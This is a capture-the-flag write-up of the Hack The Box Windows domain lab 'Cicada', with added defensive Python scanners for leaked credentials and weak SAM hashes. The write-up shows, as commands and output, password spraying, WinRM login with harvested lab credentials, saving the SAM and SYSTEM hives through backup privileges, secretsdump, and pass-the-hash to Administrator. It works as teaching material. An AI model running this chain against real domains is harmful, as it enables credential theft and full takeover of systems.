Table of Contents
Reconnaissance
We start with an nmap scan.
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-03-07 19:21:01Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-07T19:22:39+00:00; +6h59m51s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:     9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1:   2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
| SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
| -----BEGIN CERTIFICATE-----
| MIIF4DCCBMigAwIBAgITHgAAAAOY38QFU4GSRAABAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGY2ljYWRh
| MRUwEwYDVQQDEwxDSUNBREEtREMtQ0EwHhcNMjQwODIyMjAyNDE2WhcNMjUwODIy
| MjAyNDE2WjAfMR0wGwYDVQQDExRDSUNBREEtREMuY2ljYWRhLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAOatZznJ1Zy5E8fVFsDWtq531KAmTyX8
| BxPdIVefG1jKHLYTvSsQLVDuv02+p29iH9vnqYvIzSiFWilKCFBxtfOpyvCaEQua
| NaJqv3quymk/pw0xMfSLMuN5emPJ5yHtC7cantY51mSDrvXBxMVIf23JUKgbhqSc
| Srdh8fhL8XKgZXVjHmQZVn4ONg2vJP2tu7P1KkXXj7Mdry9GFEIpLdDa749PLy7x
| o1yw8CloMMtcFKwVaJHy7tMgwU5PVbFBeUhhKhQ8jBR3OBaMBtqIzIAJ092LNysy
| 4W6q8iWFc+Tb43gFP4nfb1Xvp5mJ2pStqCeZlneiL7Be0SqdDhljB4ECAwEAAaOC
| Au4wggLqMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAY5YMN7
| Sb0WV8GpzydFLPC+751AMB8GA1UdIwQYMBaAFIgPuAt1+B1uRE3nh16Q6gSBkTzp
| MIHLBgNVHR8EgcMwgcAwgb2ggbqggbeGgbRsZGFwOi8vL0NOPUNJQ0FEQS1EQy1D
| QSxDTj1DSUNBREEtREMsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2ljYWRhLERDPWh0Yj9j
| ZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlz
| dHJpYnV0aW9uUG9pbnQwgb0GCCsGAQUFBwEBBIGwMIGtMIGqBggrBgEFBQcwAoaB
| nWxkYXA6Ly8vQ049Q0lDQURBLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXkl
| MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWNpY2Fk
| YSxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmlj
| YXRpb25BdXRob3JpdHkwQAYDVR0RBDkwN6AfBgkrBgEEAYI3GQGgEgQQ0dpG4APi
| HkGYUf0NXWYT14IUQ0lDQURBLURDLmNpY2FkYS5odGIwDQYJKoZIhvcNAQELBQAD
| ggEBAIrY4wzebzUMnbrfpkvGA715ds8pNq06CN4/24q0YmowD+XSR/OI0En8Z9LE
| eytwBsFZJk5qv9yY+WL4Ubb4chKSsNjuc5SzaHxXAVczpNlH/a4WAKfVMU2D6nOb
| xxqE1cVIcOyN4b3WUhRNltauw81EUTa4xT0WElw8FevodHlBXiUPUT9zrBhnvNkz
| obX8oU3zyMO89QwxsusZ0TLiT/EREW6N44J+ROTUzdJwcFNRl+oLsiK5z/ltLRmT
| P/gFJvqMFfK4x4/ftmQV5M3hb0rzUcS4NJCGtclEoxlJHRTDTG6yZleuHvKSN4JF
| ji6zxYOoOznp6JlmbakLb1ZRLA8=
|_-----END CERTIFICATE-----
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-07T19:22:39+00:00; +6h59m52s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:     9ec5 1a23 40ef b5b8 3d2c 39d8 447d db65
| SHA-1:   2c93 6d7b cfd8 11b9 9f71 1a5a 155d 88d3 4a52 157a
| SHA-256: c8b9 54cb f36f 460f 859f 24c6 f4b1 7245 3eec 001b ce26 2f62 7229 4374 b24d 0772
| -----BEGIN CERTIFICATE-----
| MIIF4DCCBMigAwIBAgITHgAAAAOY38QFU4GSRAABAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGY2ljYWRh
| MRUwEwYDVQQDEwxDSUNBREEtREMtQ0EwHhcNMjQwODIyMjAyNDE2WhcNMjUwODIy
| MjAyNDE2WjAfMR0wGwYDVQQDExRDSUNBREEtREMuY2ljYWRhLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAOatZznJ1Zy5E8fVFsDWtq531KAmTyX8
| BxPdIVefG1jKHLYTvSsQLVDuv02+p29iH9vnqYvIzSiFWilKCFBxtfOpyvCaEQua
| NaJqv3quymk/pw0xMfSLMuN5emPJ5yHtC7cantY51mSDrvXBxMVIf23JUKgbhqSc
| Srdh8fhL8XKgZXVjHmQZVn4ONg2vJP2tu7P1KkXXj7Mdry9GFEIpLdDa749PLy7x
| o1yw8CloMMtcFKwVaJHy7tMgwU5PVbFBeUhhKhQ8jBR3OBaMBtqIzIAJ092LNysy
| 4W6q8iWFc+Tb43gFP4nfb1Xvp5mJ2pStqCeZlneiL7Be0SqdDhljB4ECAwEAAaOC
| Au4wggLqMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAY5YMN7
| Sb0WV8GpzydFLPC+751AMB8GA1UdIwQYMBaAFIgPuAt1+B1uRE3nh16Q6gSBkTzp
| MIHLBgNVHR8EgcMwgcAwgb2ggbqggbeGgbRsZGFwOi8vL0NOPUNJQ0FEQS1EQy1D
| QSxDTj1DSUNBREEtREMsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2Vz
| LENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9Y2ljYWRhLERDPWh0Yj9j
| ZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlz
| dHJpYnV0aW9uUG9pbnQwgb0GCCsGAQUFBwEBBIGwMIGtMIGqBggrBgEFBQcwAoaB
| nWxkYXA6Ly8vQ049Q0lDQURBLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXkl
| MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWNpY2Fk
| YSxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmlj
| YXRpb25BdXRob3JpdHkwQAYDVR0RBDkwN6AfBgkrBgEEAYI3GQGgEgQQ0dpG4APi
| HkGYUf0NXWYT14IUQ0lDQURBLURDLmNpY2FkYS5odGIwDQYJKoZIhvcNAQELBQAD
| ggEBAIrY4wzebzUMnbrfpkvGA715ds8pNq06CN4/24q0YmowD+XSR/OI0En8Z9LE
| eytwBsFZJk5qv9yY+WL4Ubb4chKSsNjuc5SzaHxXAVczpNlH/a4WAKfVMU2D6nOb
| xxqE1cVIcOyN4b3WUhRNltauw81EUTa4xT0WElw8FevodHlBXiUPUT9zrBhnvNkz
| obX8oU3zyMO89QwxsusZ0TLiT/EREW6N44J+ROTUzdJwcFNRl+oLsiK5z/ltLRmT
| P/gFJvqMFfK4x4/ftmQV5M3hb0rzUcS4NJCGtclEoxlJHRTDTG6yZleuHvKSN4JF
| ji6zxYOoOznp6JlmbakLb1ZRLA8=
|_-----END CERTIFICATE-----
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
64348/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
We list the SMB shares; the listing works without credentials (null session). In HR there was a text file containing the default password.
┌──(kali㉿kali)-[~/htb/cicada]
└─$ smbclient -L //10.129.231.149/ -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.231.149 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/htb/cicada]
└─$ smbclient //10.129.231.149/HR -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 21:29:09 2024
.. D 0 Thu Mar 14 21:21:29 2024
Notice from HR.txt A 1266 Thu Aug 29 02:31:48 2024
4168447 blocks of size 4096. 481132 blocks available
smb: \>
Next we brute-force SIDs anonymously to enumerate domain users and groups.
┌──(kali㉿kali)-[~/htb/cicada]
└─$ impacket-lookupsid anonymous@10.129.231.149
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Brute forcing SIDs at 10.129.231.149
[*] StringBinding ncacn_np:10.129.231.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
Among the usernames found, we can identify the user who still has the default password.
┌──(kali㉿kali)-[~/htb/cicada]
└─$ crackmapexec smb 10.129.231.149 -u users.txt -p passwords.txt --continue-on-success
---snip---
SMB         10.129.231.149  445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
We run ldapdomaindump with the account credentials obtained.
┌──(kali㉿kali)-[~/htb/cicada]
└─$ ldapdomaindump ldap://10.129.231.149 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
In the dump we can see a user whose description attribute contains password information.
david.orelious/aRt$Lp#7t*VQ!3

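Passwords in the LDAP description attribute are readable by every authenticated domain user, so this is worth auditing on the defensive side as well. The following is an added example (not part of the original writeup or of ldapdomaindump) that scans a dump in the shape of ldapdomaindump's domain_users.json for descriptions that look like they carry a credential. The JSON shape (a list of objects with "dn" and "attributes", attribute values given as strings or lists) and the sample entries are assumptions constructed for the example; only the account names and the david.orelious password come from this page.

```python
import json
import re

# Constructed sample in the shape of ldapdomaindump's domain_users.json.
# The entries are illustrative, not the real dump from the page.
SAMPLE_DUMP = json.dumps([
    {"dn": "CN=david.orelious,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["david.orelious"],
                    "description": ["Password reminder: aRt$Lp#7t*VQ!3"]}},
    {"dn": "CN=emily.oscars,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["emily.oscars"],
                    "description": ["Backup operator"]}},
    {"dn": "CN=john.smoulder,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": ["john.smoulder"],
                    "description": []}},
    # constructed: single-valued attributes given as plain strings
    {"dn": "CN=svc_tmp,CN=Users,DC=cicada,DC=htb",
     "attributes": {"sAMAccountName": "svc_tmp",
                    "description": "pwd: Xk9#qLm2!vR7 (temporary)"}},
])

# Words that usually accompany a stored secret.
KEYWORD = re.compile(r"\b(pass(word|wd)?|pwd|credential|secret)\b", re.I)
# A token of 8+ non-space characters mixing letters, digits and punctuation
# is the typical shape of a password pasted into a free-text field.
SECRET_TOKEN = re.compile(r"(?=\S*\d)(?=\S*[A-Za-z])(?=\S*[^\w\s])\S{8,}")


def _as_list(value):
    """ldap3-style JSON may give an attribute as a list or a bare string."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def find_credential_descriptions(dump_json):
    """Return [(sAMAccountName, description, reason)] for every entry whose
    description attribute looks like it carries a password."""
    findings = []
    for entry in json.loads(dump_json):
        attrs = entry.get("attributes", {})
        names = _as_list(attrs.get("sAMAccountName"))
        name = names[0] if names else entry.get("dn", "?")
        for desc in _as_list(attrs.get("description")):
            reasons = []
            if KEYWORD.search(desc):
                reasons.append("password keyword")
            if SECRET_TOKEN.search(desc):
                reasons.append("secret-like token")
            if reasons:
                findings.append((name, desc, ", ".join(reasons)))
    return findings


if __name__ == "__main__":
    for name, desc, reason in find_credential_descriptions(SAMPLE_DUMP):
        print(f"{name}: {reason}: {desc}")
```

Run against a real domain_users.json the same function gives a list to hand to the account owners; the two heuristics are deliberately independent so that a description like "see password vault" (keyword only) is still surfaced for review.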
Accessing the DEV share with the credentials just found, we can retrieve a script file.
┌──(kali㉿kali)-[~/htb/cicada]
└─$ smbclient //10.129.231.149/DEV -U david.orelious@cicada.htb
Password for [david.orelious@CICADA.HTB]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 21:31:39 2024
.. D 0 Thu Mar 14 21:21:29 2024
Backup_script.ps1 A 601 Thu Aug 29 02:28:22 2024
4168447 blocks of size 4096. 478371 blocks available
The script file contained yet another user's account credentials, hard-coded in plaintext.
┌──(kali㉿kali)-[~/htb/cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
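`ConvertTo-SecureString ... -AsPlainText -Force` is the usual sign of a credential that was pasted straight into a script, and a share full of such scripts is exactly what an attacker reads first. As an added example (not part of the original writeup), the following scanner flags the common PowerShell patterns for literal secrets and produces a redacted copy that can be safely attached to a ticket. The sample input is the page's own Backup_script.ps1 plus one constructed line; the detection patterns are my own heuristics, not an exhaustive list.

```python
import re

# Sample input: the page's Backup_script.ps1 followed by one constructed line.
SAMPLE_SCRIPT = r'''$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$pwd = "Winter2024!"   # constructed line, not in the page's script
'''

PATTERNS = [
    # a string literal fed to ConvertTo-SecureString with -AsPlainText
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r'ConvertTo-SecureString\s+(?:-String\s+)?["\']([^"\']+)["\'][^\n]*-AsPlainText', re.I)),
    # $password / $pass / $pwd / $secret assigned a string literal
    ("plaintext password variable",
     re.compile(r'\$(?:pass(?:word)?|pwd|secret)\s*=\s*["\']([^"\']+)["\']', re.I)),
    # -Password 'literal' passed to a cmdlet
    ("-Password parameter literal",
     re.compile(r'-Password\s+["\']([^"\']+)["\']', re.I)),
]


def find_hardcoded_secrets(script_text):
    """Return [(line_no, kind, secret)] for every line carrying a literal secret.
    Whole-line comments are skipped; a secret after code on the same line is not."""
    findings = []
    for no, line in enumerate(script_text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue
        for kind, pattern in PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append((no, kind, m.group(1)))
    return findings


def redact(script_text):
    """Replace every detected secret with <REDACTED> so the file can be shared."""
    out = script_text
    for _, _, secret in find_hardcoded_secrets(script_text):
        out = out.replace(secret, "<REDACTED>")
    return out


if __name__ == "__main__":
    for no, kind, secret in find_hardcoded_secrets(SAMPLE_SCRIPT):
        print(f"line {no}: {kind}: {secret[:3]}...")
    print(redact(SAMPLE_SCRIPT))
```

The fix on the script side is to take the credential from a managed store at run time (for example `Get-Credential` interactively or a secrets vault module) rather than from a literal, and to keep backup scripts out of shares that ordinary domain users can read.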
Obtaining user.txt
With the credentials found in the script, we can connect over WinRM.
┌──(kali㉿kali)-[~/htb/cicada]
└─$ evil-winrm -i 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
Privilege escalation
emily.oscars holds SeBackupPrivilege (and SeRestorePrivilege).
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
With that privilege we can save the local SAM and SYSTEM hives (the first attempt fails only because C:\temp does not exist).
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\sam C:\temp\sam.hive
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\sam C:\Users\emily.oscars.CICADA\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save hklm\system C:\Users\emily.oscars.CICADA\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download sam.hive
Info: Downloading C:\Users\emily.oscars.CICADA\sam.hive to sam.hive
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> download system.hive
Info: Downloading C:\Users\emily.oscars.CICADA\system.hive to system.hive
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA>
With the NT hash extracted from the hives, we can authenticate as Administrator via pass-the-hash.
┌──(kali㉿kali)-[~/htb/cicada]
└─$ impacket-secretsdump -sam sam.hive -system system.hive local
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
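A SAM dump like the one above is also what an incident responder or auditor ends up holding after a breach or an authorized assessment, and the first questions are the same: which accounts have an empty password, is any LM hash still stored, and do separate accounts share an NT hash (password reuse). The following is an added example (not part of the original writeup or of Impacket) that parses pwdump-style lines and answers those questions. The input is the page's secretsdump output plus one constructed line labelled as such.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string

# Sample input: the secretsdump lines shown on this page ...
PAGE_LINES = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
"""
# ... plus one constructed account that reuses the Administrator NT hash.
CONSTRUCTED_LINE = "backupadmin:1001:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::\n"
SAMPLE_DUMP = PAGE_LINES + CONSTRUCTED_LINE

# user:rid:lmhash:nthash::: as printed by secretsdump / pwdump-style tools
LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::", re.I)


def parse_hashdump(text):
    """Parse hash lines into dicts; banner lines such as '[*] ...' are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["rid"] = int(row["rid"])
        row["lm"] = row["lm"].lower()
        row["nt"] = row["nt"].lower()
        rows.append(row)
    return rows


def analyze_hashdump(text):
    """Summarise the weaknesses visible in a SAM dump without cracking anything."""
    rows = parse_hashdump(text)
    by_nt = defaultdict(list)
    for row in rows:
        by_nt[row["nt"]].append(row["user"])
    return {
        "accounts": [r["user"] for r in rows],
        # a non-empty LM hash means LM storage is still enabled: trivially crackable
        "lm_stored": [r["user"] for r in rows if r["lm"] != EMPTY_LM],
        # NT hash of "" means the account has no password at all
        "empty_password": [r["user"] for r in rows if r["nt"] == EMPTY_NT],
        # the same NT hash on several accounts means the same password on all of them
        "shared_nt": {h: users for h, users in by_nt.items()
                      if len(users) > 1 and h != EMPTY_NT},
        "rid_500": [r["user"] for r in rows if r["rid"] == 500],
    }


if __name__ == "__main__":
    for key, value in analyze_hashdump(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

The empty-password list here is harmless (Guest and DefaultAccount are disabled by default), but a shared NT hash between RID 500 and any other account is the finding that matters: it means the local Administrator password is reused, which is exactly what makes pass-the-hash of that one hash so valuable.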
┌──(kali㉿kali)-[~/htb/cicada]
└─$ evil-winrm -i 10.129.231.149 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>